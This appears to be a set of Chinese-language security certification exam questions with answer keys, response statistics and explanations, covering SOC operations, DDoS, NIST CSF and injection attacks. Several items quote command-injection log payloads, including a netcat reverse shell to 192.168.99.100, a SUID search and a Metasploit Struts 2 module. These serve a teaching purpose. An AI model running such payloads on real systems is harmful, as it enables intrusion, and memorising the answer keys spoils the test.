**30. 應用程式安全測試若僅依賴自動化工具進行的成效通常有其侷限，下列描述何者最正確？**
(A) 自動化工具可檢測常見問題，但對客製化商務邏輯了解有限而可能產生許多誤報
(B) 自動化工具的軟體授權成本較高，因此人工測試更具成本效益
(C) 自動化工具只能在應用程式處於運行狀態時執行，無法進行靜態程式碼分析
(D) 應用程式安全測試的報告無法由工具自動生成，必須由人工完成

> **答案：A**
> 統計：A(59), B(2), C(2), D(2)
>
> 解析：自動化工具（如 DAST、SAST）能有效檢測常見弱點（如 SQLi、XSS），但對客製化的商務邏輯（如特定的授權流程、業務規則）理解有限，容易產生誤報或漏報。B 成本比較不是核心侷限；C SAST 就是靜態分析，不需要程式運行；D 自動化工具當然能產生報告。

### 簡單

**1. 下列的弱點應對修補方式，何者最為適當？**
(A) 緩衝區溢位(Buffer Overflow)使用記憶體執行阻擋(Data Execution Prevention, DEP)
(B) 遠端程式碼執行(RCE)僅以防火牆封鎖流量
(C) 指令注入(Command Injection)只做字串過濾
(D) 資源注入(Resource Injection)採黑名單過濾資源名稱

> **答案：A**
> 統計：A(54), B(2), C(1), D(14)
>
> 解析：DEP 是作業系統層級的記憶體保護機制，可阻止緩衝區溢位攻擊中在資料區段執行惡意程式碼，是正確且有效的防護。B「僅以防火牆封鎖」不能根治 RCE；C「只做字串過濾」容易被繞過；D「黑名單過濾」不如白名單有效。14 人選 D 是沒想到黑名單的侷限性。

**13. 若安全營運中心(SOC)於內部 DNS 伺服器偵測到大量指向 \*.onion 的查詢，但防火牆尚未攔阻，下列何項即時防禦措施最符合效率及不影響正常服務運作？**
(A) 直接封鎖所有 53/TCP 與 53/UDP 流量
(B) 通知使用者可能違反政策，待其自我修正
(C) DNS 層將可疑頂級網域(Top-Level Domain, TLD)解析為內部黑洞(sinkhole)IP
(D) 調高 DNS 服務優先權，以降低查詢逾時

> **答案：C**
> 統計：A(4), B(5), C(53), D(3)
>
> 解析：DNS sinkhole 是最精準且不影響正常服務的即時防禦措施——只把 .onion 等可疑 TLD 的查詢導向內部黑洞 IP，正常 DNS 查詢完全不受影響。A 封鎖所有 53 埠流量會癱瘓全部 DNS 服務、B 通知使用者太被動不是即時防禦、D 調高優先權跟防禦無關。

**28.（複選）【題組 3】情境如附圖所示。某組織正計畫建立一個符合其未來需求的資安營運中心(Security Operations Center, SOC)，並考慮納入雲端與營運技術(OT)環境的監控，以應對日益複雜的網路攻擊。在建立 SOC 過程中應處理或採納的關鍵考量或功能，下列描述哪些最正確？**

> 近年來，全球網路資安情勢日趨嚴峻，伴隨地緣政治緊張，複雜且高強度的國家級網路攻擊，例如：進階持續性威脅（Advanced Persistent Threat, APT）日益頻繁。這些攻擊不僅針對傳統資訊技術（Information Technology, IT）環境，更擴展至關鍵基礎設施的營運技術（Operational Technology, OT）系統、企業雲端服務與員工行動裝置。攻擊手法融合了勒索軟體、供應鏈攻擊等多種戰術，目的從情資竊取到癱瘓業務不等，對組織的資料完整性、可用性與機密性構成前所未有的挑戰。

(A) 根據組織的規模、業務需求以及預期提供的服務範圍，建立適當的 SOC 組織架構，包括是否涵蓋雲端、行動和營運技術(OT)環境的監控與回應職責
(B) 實做全面的網路威脅情資(CTI)計畫，以深入理解威脅者(包含其戰術、技術與程序 TTPs)，並依據對其分析來調整偵測、防禦措施，並支援威脅狩獵
(C) 建立績效衡量指標需聚焦於 SOC 對組織外部形象的正面影響，內部運作效率可於事後再視情況補充評估
(D) 透過標準作業程序(SOPs)和應急手冊，明確定義事件類別、回應步驟和升級路徑，並根據事件對業務的潛在影響來優先處理事件回應，以確保在危機時刻能迅速且精準行動

> **答案：A, B, D**
> 統計：A(65), B(63), C(8), D(62)
>
> 解析：A 根據組織規模與需求建立 SOC 架構正確；B 實做 CTI 計畫理解 TTPs 並支援威脅狩獵正確；D SOPs 與應急手冊明確定義事件分類與回應步驟正確。C「績效衡量指標聚焦外部形象、內部效率事後補充」完全錯誤——SOC 績效指標應首重內部運作效率（如 MTTD、MTTR），外部形象是次要的。

**33.【題組 4】情境如附圖所示。請問這些日誌內容裡面的「127.0.0.1; sleep 5」，最有可能是發生下列哪一種攻擊情境？**

> 你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。
> 你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容：
> ```
> 127.0.0.1; sleep 5
> 127.0.0.1; whoami
> 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt
> ```

(A) 攻擊者想確認該功能是否存在資料庫注入攻擊(SQL Injection)
(B) 攻擊者想確認該功能是否存在反序列化攻擊(Insecure Deserialization)
(C) 攻擊者想確認該功能是否存在指令注入攻擊 (Command Injection)
(D) 攻擊者想確認該功能是否存在資安記錄及監控失效 (Security Logging and Monitoring Failures)

> **答案：C**
> 統計：A(1), B(4), C(46), D(18)
>
> 解析：`127.0.0.1; sleep 5` 是典型的 Command Injection 測試手法——用分號(;)串接系統指令，`sleep 5` 讓伺服器延遲 5 秒，如果回應確實延遲了就確認指令注入成功（Time-based 盲注技巧）。A SQL Injection 的 payload 會是 SQL 語法不是 shell 指令；B 反序列化攻擊涉及序列化物件；D 記錄監控失效是弱點類型不是攻擊手法。18 人選 D 可能是看到「日誌」就聯想到 Logging Failures。

**34.【題組 4】情境如附圖所示。請問「127.0.0.1; whoami」可能是攻擊者想要用來評估下列何項資訊？（請選擇最合適的選項。）**

> 你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。
> 你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容：
> ```
> 127.0.0.1; sleep 5
> 127.0.0.1; whoami
> 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt
> ```

(A) 評估此作業系統版本是否有現成的漏洞可以利用
(B) 評估該使用者是否有足夠的權限可以存取機敏資料
(C) 評估該使用者的群組是否有足夠的權限可以存取機敏資料
(D) 評估當下的系統路徑位於哪個目錄中

> **答案：B**
> 統計：A(6), B(50), C(5), D(4)
>
> 解析：`whoami` 指令回傳的是「當前執行程序的使用者身份」（如 root、www-data、apache 等），攻擊者用此來評估目前取得的權限層級——如果是 root 就可以直接存取機敏資料，如果是低權限帳號就需要提權。A 評估 OS 版本應該用 `uname -a`；C 評估群組應該用 `groups` 或 `id`；D 評估目錄應該用 `pwd`。

**37.【題組 5】情境如附圖所示。你需協助開發團隊建立自動化原始碼檢測機制以提前發現弱點，請問考量 DevSecOps 的精神。下列何種技術最適合整合至 CI/CD 工作流程中？**

> 你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標：
> 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」；
> 2. 執行一次針對雲端主機與內部網段的「資安健診」作業；
> 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。
>
> 在測試與健診過程中，團隊發現若干高風險弱點與不當配置，例如：缺乏原始碼檢測、程式碼包含敏感資訊、驗證缺陷等。你需依據檢測結果，提出分析報告、優先順序、工具選用建議，以及內部控制對策，並向董事會報告成果。

(A) 靜態應用安全測試(Static Application Security Testing, SAST)
(B) SQL 資料表比對工具
(C) 黑箱測試(Black-box Testing)
(D) 動態應用安全測試(Dynamic Application Security Testing, DAST)

> **答案：A**
> 統計：A(45), B(2), C(2), D(13)
>
> 解析：SAST 在程式碼編譯前就能分析原始碼找出弱點，最適合整合到 CI/CD pipeline 中自動執行。B SQL 比對工具不是安全測試；C 黑箱測試需要執行環境不適合 CI/CD 自動化；D DAST 需要應用程式運行中才能測試，雖然也能整合但不如 SAST 適合「原始碼檢測」場景。13 人選 D 是沒注意題目問的是「原始碼」檢測。

**38.【題組 5】情境如附圖所示。你負責進行 ERP-Web 的 Web 弱點滲透測試，需選擇具備攔截與注入模擬功能的工具。請問下列何項工具最適合？**

> 你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標：
> 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」；
> 2. 執行一次針對雲端主機與內部網段的「資安健診」作業；
> 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。
>
> 在測試與健診過程中，團隊發現若干高風險弱點與不當配置，例如：缺乏原始碼檢測、程式碼包含敏感資訊、驗證缺陷等。你需依據檢測結果，提出分析報告、優先順序、工具選用建議，以及內部控制對策，並向董事會報告成果。

(A) SonarQube
(B) Burp Suite
(C) Qualys
(D) Nmap

> **答案：B**
> 統計：A(5), B(50), C(1), D(14)
>
> 解析：Burp Suite 是 Web 應用滲透測試的標準工具，核心功能就是 HTTP 攔截代理（Proxy）＋注入模擬（Intruder/Repeater）。A SonarQube 是 SAST 靜態分析工具不是滲透測試；C Qualys 是弱點掃描平台不具備攔截注入功能；D Nmap 是網路掃描工具不是 Web 應用測試。14 人選 D 是把網路掃描和 Web 滲透搞混了。

### 適中

**6.【題組 1】情境如附圖所示。以這個案例來說，施測人員用於執行 OGNL 語法的 HTTP Header 最有可能是下列何者？**

> 某醫療資訊系統採用 Apache Struts 2 作為開發框架，且版本未及時更新。該醫院在做紅隊演練時，施測人員發現可透過特定 HTTP 請求，於 HTTP Header 中對醫療資訊系統插入惡意 OGNL（Object Graph Navigation Language）語法，成功在系統上遠端執行任意指令（RCE），取得 Shell 權限。施測人員進一步利用此權限，在內網大量掃描，並且進行橫向移動（Lateral Movement），最終施測人員找到資料庫的伺服器，並且以預設帳號密碼登入，竊取大量病患的醫療資料，若這個漏洞被攻擊者利用，將會造成嚴重的機密資料外洩事件。

(A) Accept-Language
(B) Cache-Control
(C) Content-Type
(D) Origin

> **答案：C**
> 統計：A(11), B(17), C(36), D(5)
>
> 解析：Apache Struts 2 最知名的 OGNL 注入漏洞（如 CVE-2017-5638, S2-045）就是透過 Content-Type Header 注入 OGNL 表達式。攻擊者在 Content-Type 中插入惡意 OGNL 語法，Struts 2 的解析器會執行這段表達式。A Accept-Language、B Cache-Control、D Origin 都不是 Struts 2 OGNL 注入的攻擊向量。17 人選 B 和 11 人選 A 是不熟悉這個經典漏洞。

**7.【題組 1】情境如附圖所示。醫院若想針對內網環境進行上述 Struts 2 漏洞的快速偵測並驗證，使用下列何種工具或指令最為適切？**

> 某醫療資訊系統採用 Apache Struts 2 作為開發框架，且版本未及時更新。該醫院在做紅隊演練時，施測人員發現可透過特定 HTTP 請求，於 HTTP Header 中對醫療資訊系統插入惡意 OGNL（Object Graph Navigation Language）語法，成功在系統上遠端執行任意指令（RCE），取得 Shell 權限。施測人員進一步利用此權限，在內網大量掃描，並且進行橫向移動（Lateral Movement），最終施測人員找到資料庫的伺服器，並且以預設帳號密碼登入，竊取大量病患的醫療資料，若這個漏洞被攻擊者利用，將會造成嚴重的機密資料外洩事件。

(A) nmap -sV --script=http-shellshock
(B) sqlmap -u "https://struts2.com"
(C) nikto -host struts2.com -C all
(D) msf > use exploit/multi/http/struts2_content_type_ognl

> **答案：D**
> 統計：A(20), B(5), C(8), D(32)
>
> 解析：Metasploit 的 `struts2_content_type_ognl` 模組是專門針對 Struts 2 Content-Type OGNL 注入漏洞的 exploit，能快速偵測並驗證該漏洞是否存在。A nmap 的 http-shellshock 腳本是檢測 Shellshock 漏洞（CVE-2014-6271），跟 Struts 2 無關；B sqlmap 是 SQL Injection 工具；C nikto 是通用 Web 掃描器，無法精準驗證特定 Struts 2 OGNL 漏洞。20 人選 A 是把 Shellshock 和 Struts 2 搞混了。

**15.（複選）下列何項正確的描述了美國國家標準技術研究院(NIST)的網路安全框架(Cyber Security Framework, CSF)新增的「治理(Govern)」功能重點？**
(A) 明確高層管理在網路安全策略中的責任與決策角色
(B) 提供技術層面的具體指導來實施威脅緩解機制
(C) 強調將網路安全融入組織的整體風險管理框架中
(D) 引入自動化工具以簡化網路安全事件的回應流程

> **答案：A, C**
> 統計：A(62), B(19), C(60), D(9)
>
> 解析：NIST CSF 2.0 新增的 Govern 功能強調兩個核心：A 高層管理的責任與決策角色（治理層面的問責）、C 將網路安全融入組織整體風險管理框架（不再孤立看待資安）。B 技術層面的威脅緩解屬於 Protect/Detect 功能、D 自動化回應屬於 Respond 功能，都不是 Govern 的重點。19 人選 B 是把「治理」和「保護」搞混了。

**16.（複選）如附圖所示。Anet 為一家 ISP 網際網路服務商，其參考關鍵基礎設施的網路管理要求，將公司的網路服務系統分割為 2 個獨立的部份：一、Data Service Backbone 數據服務骨幹網路僅提供數據服務流，用以提供終端客戶上網與雲端服務、二、Management DCN(Data Control Network)管理數據網路，用以建立網路設備的控制訊務流並提供操作服務網路設備與系統之功能；此外，並將骨幹網路設備關閉網路通道內(In-Band)的連線控制功能，僅提供通道外(Out-Band)的控制功能，避免非必要的設備連線風險。因應此項維運安全需求，請問下列哪些規劃功能較適合應用於此系統架構之中？**

![Q16 ISP網路架構圖](https://hackmd.io/_uploads/rJ4f48aKWe.png)
(A) 數據服務骨幹網路設備上，除了 Console 和 Management 埠之外，關閉所有的控制連線埠位
(B) 在 DCN 網路中建置流量清洗(DDoS Mitigation)系統，避免少數用戶遭受 DDoS 攻擊時，影響所有其他客戶的正常網路服務與連線品質
(C) 在 DCN 網路上建置 NAC(Network Access Control)網路存取控制系統，管理僅有授權的設備可進行連接通訊和設備操作功能
(D) 以網路防火牆將各網路區塊隔離開來，並僅限 DCN 的特定設備或網址可能進入數據服務骨幹網路設備的控制網段和埠號

> **答案：A, C, D**
> 統計：A(45), B(40), C(65), D(66)
>
> 解析：題目的核心是 Out-of-Band 管理架構的安全規劃。A 關閉骨幹設備非必要的控制埠（只留 Console 和 Management）減少攻擊面；C 在 DCN 上建置 NAC 確保只有授權設備能管理網路設備；D 防火牆隔離區域並限制 DCN 進入骨幹的路徑。三者都符合 OOB 管理的安全原則。B 流量清洗(DDoS Mitigation)應該建在 Data Service Backbone 上保護客戶，不是建在管理用的 DCN 上。40 人選 B 是沒注意到 DDoS 防護應放在數據服務端而非管理端。

**17.【題組 2】情境如附圖所示。某一天業務人員反應在公司外部無法連回公司展示伺服器進行 Demo，洽 MIS 人員檢查，公司上網電路正常，由公司連外上網也正常，檢查主機連線記錄及網路側錄資料。請問業務無法在外部展示期間，公司最可能遭受下列什麼類型的攻擊？**

![題組2情境圖一](https://hackmd.io/_uploads/BJh8NUatWl.png)
![題組2情境圖二](https://hackmd.io/_uploads/r1owVUTF-e.png)
![題組2情境圖三](https://hackmd.io/_uploads/H1qOVU6tbe.png)
(A) 跨站腳本攻擊(Cross Site Scripting)
(B) DNS 洪水攻擊(DNS Flood)
(C) HTTP 洪水攻擊(HTTP Flood)
(D) ICMP 洪水攻擊(ICMP Flood)

> **答案：C**
> 統計：A(3), B(13), C(44), D(6)
>
> 解析：從主機連線記錄可看到大量 HTTP 連線湧入造成流量暴增，且公司對外上網正常（頻寬未被完全壅塞），表示攻擊是針對展示伺服器的應用層。HTTP Flood 是典型的第七層 DDoS，大量 HTTP 請求淹沒 Web 服務但不一定佔滿全部頻寬。A XSS 不會造成服務不可用、B DNS Flood 針對 DNS 伺服器、D ICMP Flood 是網路層攻擊通常會影響整體頻寬（但題目說公司上網正常）。

**19.【題組 2】情境如附圖所示。承上題，針對 TCP SYN Flood 攻擊，下列何項應對策略可能無法有效緩解攻擊的影響？**

![題組2情境圖一](https://hackmd.io/_uploads/BJh8NUatWl.png)
![題組2情境圖二](https://hackmd.io/_uploads/r1owVUTF-e.png)
![題組2情境圖三](https://hackmd.io/_uploads/H1qOVU6tbe.png)
(A) 啟用 DNS 反向代理
(B) 設定 TCP 連接速率限制
(C) 啟用 SYN Cookies 機制
(D) 將展示服務部署到內容派遣網路(Content Distribution Network，CDN)上，由 CDN 進行 DDoS 防禦

> **答案：A**
> 統計：A(34), B(14), C(9), D(7)
>
> 解析：DNS 反向代理是針對 DNS 查詢的代理機制，跟 TCP SYN Flood 完全無關——SYN Flood 是在 TCP 三向交握階段發動的攻擊，DNS 反向代理無法緩解。B TCP 連接速率限制可以限制 SYN 封包頻率；C SYN Cookies 是經典的 SYN Flood 防禦機制，不需分配資源就能驗證連線合法性；D CDN 可以在邊緣節點吸收 DDoS 流量。14 人選 B 可能覺得速率限制也會擋到正常連線，但題目問的是「無法有效緩解」，速率限制至少能減輕影響。

**29. 如附圖所示是一段 Python 程式碼，你受聘於一個公司進行源碼檢測，需確認程式碼中是否隱藏潛在的惡意行為或漏洞。經分析發現，x() 函數對輸入執行了某種操作，並透過字串反轉進行額外處理。下列何項最正確地描述該程式碼的功能具有潛在風險？**

```python
def x(a):
    b = "".join([chr(ord(c) ^ 0x42) for c in a])
    return b[::-1]

def main():
    s = "SYP{txf_ofq}"
    t = x(s)
    if t == "}afq{noT_SPY":
        print("Access Granted")
    else:
        print("Access Denied")

main()
```

(A) 程式碼使用一種簡單 XOR 加密，有容易被破解的風險
(B) 程式碼包含難以追蹤的邏輯漏洞，可能被用於後門驗證邏輯
(C) 程式碼進行了無法逆向的加密方式，無法直接解密字串 SYP{txf_ofq}
(D) 程式碼邏輯錯誤，t 的結果永遠無法等於 "}afq{noT_SPY"

> **答案：A**
> 統計：A(38), B(9), C(9), D(8)
>
> 解析：x() 函數對每個字元做 XOR 0x42 運算再反轉字串，這是典型的簡單 XOR 加密/混淆手法。XOR 加密是可逆的（再 XOR 一次就還原），安全性很低，容易被逆向破解。B「後門驗證邏輯」雖然程式確實有驗證功能，但主要風險在於加密方式太弱；C XOR 完全可逆不是「無法逆向」；D 邏輯可以正確執行（XOR 後反轉的結果確實可以匹配）。

**31.（複選）一家金融科技公司委託資安廠商對其新上線的行動銀行 App 進行一次完整的資安檢測。為了徹底評估其防護能力，下列何項作業較「不」屬於安全檢測項目？**
(A) 執行滲透測試(Penetration Testing)，模擬駭客從外部嘗試入侵 App 與後端伺服器
(B) 進行原始碼檢測(Source Code Review)，找出應用程式邏輯與編碼層面的安全漏洞
(C) 對其使用的雲端平台環境進行雲端安全配置檢視 (Cloud Security Posture Management, CSPM)
(D) 針對 App 安裝檔(.apk / .ipa)進行逆向工程

> **答案：C, D**
> 統計：A(1), B(7), C(44), D(57)
>
> 解析：題目問的是「不屬於」安全檢測項目。C CSPM 是雲端基礎設施的安全配置管理，屬於雲端運維層面而非 App 本身的安全檢測；D 逆向工程是分析已編譯的安裝檔，雖然可以發現問題但通常不屬於標準資安檢測委託範疇（而是攻擊者或研究者的行為）。A 滲透測試和 B 原始碼檢測都是標準的 App 安全檢測項目。

**32.（複選）常見資安健診服務需求中，下列哪些選項適合公部門所需的政府組態基準(Government Configuration Baseline, GCB)的類型？**
(A) 作業系統組態設定檢視
(B) 瀏覽器組態設定檢視
(C) 資料庫組態設定檢視
(D) 惡意活動設定檢視

> **答案：A, B, C，原本答案A, B**
> 統計：A(56), B(53), C(45), D(21)
>
> 解析：GCB（政府組態基準）涵蓋的檢視類型包括：作業系統(A)、瀏覽器(B)、資料庫(C) 等系統組態的安全設定基準。D「惡意活動設定檢視」不是 GCB 的範疇——GCB 是「組態基準」檢視，確認系統設定是否符合安全標準，不是偵測惡意活動。21 人選 D 是把「組態檢視」與「惡意活動偵測」搞混了。

**35.【題組 4】情境如附圖所示。請問「127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt」這個日誌的內容，可能代表下列何種攻擊情境？（請選擇最合適的選項。）**

> 你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。
> 你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容：
> ```
> 127.0.0.1; sleep 5
> 127.0.0.1; whoami
> 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt
> ```

(A) 攻擊者想要勘查 192.168.99.100 的 80 port 是否可進行連線，可以連線就可以讀取更多網頁內容
(B) 攻擊者想要讀取 /bin/bash 這個檔案內容，並且把結果輸出到 /tmp/tmp.txt 裡面
(C) 攻擊者想要透過 nc 進行反向連線，讓 192.168.99.100 這台電腦可以對伺服器輸入指令
(D) 攻擊者想要讀取作業系統的版本資訊，並且尋找有無可利用的漏洞直接對作業系統進行攻擊

> **答案：C**
> 統計：A(6), B(18), C(36), D(5)
>
> 解析：`/bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt` 是經典的 Reverse Shell 指令——啟動互動式 bash shell，透過 nc（netcat）將 shell 的輸入輸出導向攻擊者的機器（192.168.99.100:80），讓攻擊者可以遠端對伺服器下指令。A 不是勘查埠號是建立反向 shell；B 不是讀取 /bin/bash 檔案內容而是執行它；D 與讀取 OS 版本無關。18 人選 B 是把 `/bin/bash -i` 誤解為讀取檔案。

**36.（複選）【題組 4】情境如附圖所示。你參考日誌內容，嘗試輸入一樣的參數內容「127.0.0.1; whoami」到網頁應用程式中，發現回傳結果是 www-data。同時，你也在作業系統的指令日誌裡面看到「find / -perm -u=s -type f 2>/dev/null」，請問攻擊者執行這個指令「最不可能」做下列哪些攻擊行為？（請選擇最合適的選項。）**

> 你是一位企業的藍隊防禦專家，今天你忽然收到來自 SOC 的告警，顯示有某個伺服器正在發生異常行為，於是你開始對這個伺服器展開調查，評估是否有發生資安事件。
> 你發現伺服器裡面有一個 ping 的功能，並且在該功能的網頁應用程式日誌裡面出現這種類型的內容：
> ```
> 127.0.0.1; sleep 5
> 127.0.0.1; whoami
> 127.0.0.1; /bin/bash -i 2>&1 | nc 192.168.99.100 80 > /tmp/tmp.txt
> ```

(A) 尋找有被設定 setuid 的檔案，後續可嘗試用該檔案來把當前身分提升成為 root 權限
(B) 尋找有被設定 setgid 的檔案，後續可嘗試用該檔案來把當前身分提升成為 root 權限
(C) 尋找有被設定 stickyBit 的目錄，後續可嘗試用該目錄裡面的檔案來提升成為 root 權限
(D) 尋找有被設定為 root:root 的檔案與目錄，確認機敏資料在哪些地方

> **答案：B, C, D**
> 統計：A(25), B(40), C(60), D(41)
>
> 解析：`find / -perm -u=s` 只找 setuid 位（`-u=s`），不是 setgid（`-g=s`）也不是 stickyBit（`-k`），更不是找 root:root 的檔案。所以 B、C、D 都不是這個指令能做的事。A 正確描述了 find setuid 檔案來嘗試提權的行為，是「可能」的攻擊，不選。

**39.【題組 5】情境如附圖所示。你在整理將完整的測試報告準備提交給董事會，下列何項內容最「不」重要？**
(A) 測試人員背景與工具版本
(B) 執行測試所需耗費的時間
(C) 符合公司期望及需求的結論
(D) 弱點評估結果、評估計分的方法論、分數與修補建議

> 你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標：
> 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」；
> 2. 執行一次針對雲端主機與內部網段的「資安健診」作業；
> 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。
>
> 在測試與健診過程中，團隊發現若干高風險弱點與不當配置，例如：缺乏原始碼檢測、程式碼包含敏感資訊、驗證缺陷等。你需依據檢測結果，提出分析報告、優先順序、工具選用建議，以及內部控制對策，並向董事會報告成果。

> **答案：B**
> 統計：A(8), B(41), C(17), D(0)
>
> 解析：董事會關心的是結果、風險、建議與合規性，「執行測試耗費多少時間」對決策層來說最不重要。A 測試人員資格與工具版本影響報告可信度需要揭露；C 結論需符合公司需求；D 弱點結果與修補建議是報告核心。17 人選 C 可能覺得「符合期望」太主觀，但報告本來就該回應委託方需求。

### 困難

**5.【題組 1】情境如附圖所示。「在系統插入惡意 OGNL 語法，成功遠端執行任意指令並取得 Shell 權限」這一攻擊行為，根據 MITRE ATT&CK，最適合歸類於下列哪一個戰術？**

> 某醫療資訊系統採用 Apache Struts 2 作為開發框架，且版本未及時更新。該醫院在做紅隊演練時，施測人員發現可透過特定 HTTP 請求，於 HTTP Header 中對醫療資訊系統插入惡意 OGNL（Object Graph Navigation Language）語法，成功在系統上遠端執行任意指令（RCE），取得 Shell 權限。施測人員進一步利用此權限，在內網大量掃描，並且進行橫向移動（Lateral Movement），最終施測人員找到資料庫的伺服器，並且以預設帳號密碼登入，竊取大量病患的醫療資料，若這個漏洞被攻擊者利用，將會造成嚴重的機密資料外洩事件。

(A) Reconnaissance(偵察)
(B) Initial Access(初始存取)
(C) Privilege Escalation(權限提升)
(D) Defense Evasion(防禦規避)

> **答案：B**
> 統計：A(0), B(32), C(38), D(1)
>
> 解析：題目描述的是「在系統插入 OGNL 語法成功遠端執行任意指令取得 Shell」，這是攻擊者從外部「進入」系統的第一步，對應 MITRE ATT&CK 的 Initial Access（初始存取）。38 人選 C Privilege Escalation 是因為看到「取得 Shell 權限」就聯想到提權，但這裡取得的 Shell 是透過 RCE 漏洞直接獲得的，不是從低權限提升到高權限，而是利用漏洞直接進入系統。A 偵察是情蒐階段、D 防禦規避是躲避偵測。

**20.（複選）【題組 2】情境如附圖所示。承上題，參考美國國家標準技術研究院(NIST)創建的網路安全框架(Cyber Security Framework，CSF)，請問 ABC 新創公司在資源有限的情況下，應該導入哪些 DDoS 防護機制最為合適？**

![題組2情境圖一](https://hackmd.io/_uploads/BJh8NUatWl.png)
![題組2情境圖二](https://hackmd.io/_uploads/r1owVUTF-e.png)
![題組2情境圖三](https://hackmd.io/_uploads/H1qOVU6tbe.png)
(A) RS.CO-02：當發生 DDoS 事件時，即時與內外部利害關係人溝通
(B) ID.IM-01：擴增網路頻寬與設備效能以提高 DDoS 攻擊的門檻
(C) DE.CM-01：增設新世代防火牆限制惡意流量與偵測異常威脅
(D) RS.MA-01：一旦發生 DDoS 攻擊時可以啟動網路上游業者的流量清洗服務

> **答案：A, C, D，原本答案C, D**
> 統計：A(37), B(21), C(62), D(60)
>
> 解析：題目關鍵字是「資源有限」。A 事件發生時與利害關係人溝通（RS.CO-02 回應類）成本低但效果好；C 新世代防火牆限制惡意流量（DE.CM-01 偵測類）是基本防護；D 啟動上游 ISP 流量清洗（RS.MA-01 回應類）是彈性的按需服務，平時不花錢。B「擴增頻寬與設備效能」是最花錢的做法，對資源有限的新創公司不合適——用錢砸頻寬來硬扛 DDoS 不是好策略。21 人選 B 是沒注意到「資源有限」的限制條件。

**22. 如附圖所示。各地區/領域之電腦緊急應變小組(Computer Emergency Response Team, CERT)與電腦資安事件應變小組(Computer Security Incident Response Team, CSIRT)，常透過紅綠燈協定(Traffic Light Protocol, TLP)來促進敏感資訊如威脅情資之分享與有效協作，關於紅綠燈協定之敘述，下列何者「最不正確」？**

> ![TLP color-coding 對照表](https://hackmd.io/_uploads/BkGVYL6K-g.png)

(A) TLP:RED 僅供收件者本人查閱或聆聽，不得進一步揭露
(B) TLP:AMBER 收件者僅於組織內使用，且任何狀況都不得對客戶散播
(C) TLP:GREEN 收件者可於相關事件的特定社群中散播資訊
(D) TLP:CLEAR 收件者可以將此類資訊散播至任何地方，對揭露沒有限制

> **答案：B**
> 統計：A(7), B(32), C(8), D(18)
>
> 解析：TLP 2.0 中，TLP:AMBER 允許在「需要知道(need-to-know)」的基礎上與組織內成員及客戶分享（客戶若需要知道以保護自身，是可以分享的）。B 說「任何狀況都不得對客戶散播」太絕對，不正確。若要完全限制不對外分享，應使用 TLP:AMBER+STRICT。A TLP:RED 僅限收件者本人正確；C TLP:GREEN 可在社群內散播正確；D TLP:CLEAR 無限制正確。18 人選 D 可能是對 TLP:CLEAR「完全沒限制」感到懷疑，但 CLEAR 本來就是公開資訊等級。

**24.（複選）在網路安全的資安監控機制中，其一方式為使用身份驗證事件閾值(Authentication Event Thresholding)來識別異常使用者行為，透過收集身份驗證事件，來建立使用者活動基準，並分析身份驗證事件是否一致來而達成偵測。關於可作為身份驗證事件閾值的資料來源敘述，下列何者最為適切？**
(A) 虛擬私人網路(Virtual private network, VPN)伺服器日誌檔
(B) 網路流量(Network flow)日誌檔
(C) 身份與存取管理(Identity and access management, IDAM)日誌檔
(D) 輕量型目錄存取通訊協定(Lightweight directory access protocol, LDAP)網路傳輸量

> **答案：A, C, D**
> 統計：A(58), B(25), C(71), D(44)
>
> 解析：身份驗證事件閾值需要的是「身份驗證」相關的日誌來源。A VPN 伺服器日誌包含使用者遠端連線的驗證記錄；C IDAM 日誌是身份驗證的核心來源，記錄所有身份驗證事件；D LDAP 傳輸量包含目錄服務的驗證查詢（如 AD 登入驗證）。三者都直接涉及身份驗證活動。B 網路流量(Network flow)日誌只記錄網路層的流量資訊（IP、Port、流量大小），不包含身份驗證的具體事件內容，無法作為驗證事件閾值的有效資料來源。25 人選 B 是把「網路流量」與「身份驗證」混淆了。

**40.（複選）【題組 5】情境如附圖所示。進行系統原始碼掃描時，下列哪些情境可被歸類為「Broken Authentication」或「Access Control」相關問題？**

> 你受聘為「超好用科技股份有限公司」的資安顧問，協助執行其年度資訊安全強化計畫。該公司目前正導入 DevSecOps 實踐，並預定完成以下三項目標：
> 1. 對旗下新開發的 ERP-Web 系統執行全面「原始碼檢測」與「滲透測試」；
> 2. 執行一次針對雲端主機與內部網段的「資安健診」作業；
> 3. 建立跨部門的風險評估與弱點修補作業流程，以提升資安治理成熟度。
>
> 在測試與健診過程中，團隊發現若干高風險弱點與不當配置，例如：缺乏原始碼檢測、程式碼包含敏感資訊、驗證缺陷等。你需依據檢測結果，提出分析報告、優先順序、工具選用建議，以及內部控制對策，並向董事會報告成果。

